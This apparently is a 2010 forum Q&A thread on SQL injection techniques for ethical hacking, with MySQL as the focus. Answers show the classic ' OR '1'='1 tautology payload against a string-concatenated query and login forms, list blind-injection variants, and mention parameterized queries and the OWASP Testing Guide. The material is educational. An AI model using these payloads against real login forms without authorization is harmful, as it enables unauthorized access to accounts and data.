Hi all,
I want to know if you have ever performed injection on a website using SQL injection for ethical hacking.
What tricks/techniques have you have used (especially mysql)?
+2
A:
Nice infomation about techniqs for
Example :
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
pass userName = ' or '1'='1
SELECT * FROM users WHERE name = '' OR '1'='1';
Type of it
1.2 Incorrect type handling
1.3 Vulnerabilities inside the database server
1.4 Blind SQL injection
1.4.1 Conditional responses
1.4.2 Conditional errors
1.4.3 Time delays
Pranay Rana
2010-09-27 06:28:49
+5
A:
I've used the standard trick on login forms:
user: admin
pass: ' OR '1'='1
Emil Vikström
2010-09-27 06:28:51
Could you elaborate on what kind of counter measures can be taken?
diamandiev
2010-09-27 06:41:13
@diamandiev no need to use any special counter measures at all. Good built application is already invulnerable to this silly "attack"
Col. Shrapnel
2010-09-27 06:49:24
To answer my self. Use parameters and/or stored procedures: UserPassword = @Password
diamandiev
2010-09-27 06:49:26
and did that ever work?
Thilo
2010-09-28 01:23:03
Thilo, yes. Not in my own code, but when checking others'. I've worked for a web hosting provider and when someone hacks a website the customer always blames us first, even though the above SQL injection often works. Trying standard SQL injection attacks before checking their code often saves a lot of time :-)
Emil Vikström
2010-09-28 05:40:26
+5
A:
If you intend to perform ethical hacking or penetration testing of applications using MySQL, you'll find the OWASP Testing Guide, specifically the section on MySQL to be of immense value, apart from the generic Testing Guide for SQL injection.
Note that this does not make any assumptions about the framework or langauge in use - PHP, Java (including Java EE, Spring etc.), so it is pretty generic in how SQL injection may be attempted against an application. The actual techniques involved in getting the user inputs to the database access layer of the application, indeed will vary from one application to another. Applications that parse HTTP requests, will of course, require all inputs (URL parameters, name-value pairs in the POST body, HTTP headers) to be suspect. Having a different source of input (say XML or JSON instead of simple HTTP requests) will require you to feed in SQL in appropriate manner that will be understood by the application's parsers, eventually resulting in transportation of SQL to the layer where database queries are executed.
Vineet Reynolds
2010-09-27 06:33:59
+6
A:
Not directly, but sometimes I do LIKE searches with wildcards (%) even though the search page does not say it supports them.
Thilo
2010-09-27 06:42:50
I think Neopets once acknowledged that this trick worked with some of their search boxes. Or at least they didn't mind fan sites showing that it works.
BoltClock
2010-09-27 17:01:25
A:
You just remimded this, I hope you'll find it fun: http://xkcd.com/327/ ;)
Dane411
2010-09-27 06:48:22
Little Bobby Tables moved to Norway - https://www.sysedata.no/nyheter/edvin-tables#english
Vineet Reynolds
2010-09-27 06:53:00
"and figured we'd use the opportunity for some harmless - or so we thought - fun."At least the companies who had to work with this company on their databases had to make a great sql anti-injection protection! :)
Dane411
2010-09-27 07:23:00
A:
Yes I have used the basic methods like everyone else, but always on my own websites
' OR '1'='1
I even joined a site where you can learn the basics of hacking in a website, they have put up a serie of website specially made to show the vulnerability of the website (of course you are not shown how to do it but you have to find it out for yourself). And no I feel no guilt whatsoever as I do not use it to harm other peoples website but only myne.
krike
2010-09-27 06:56:58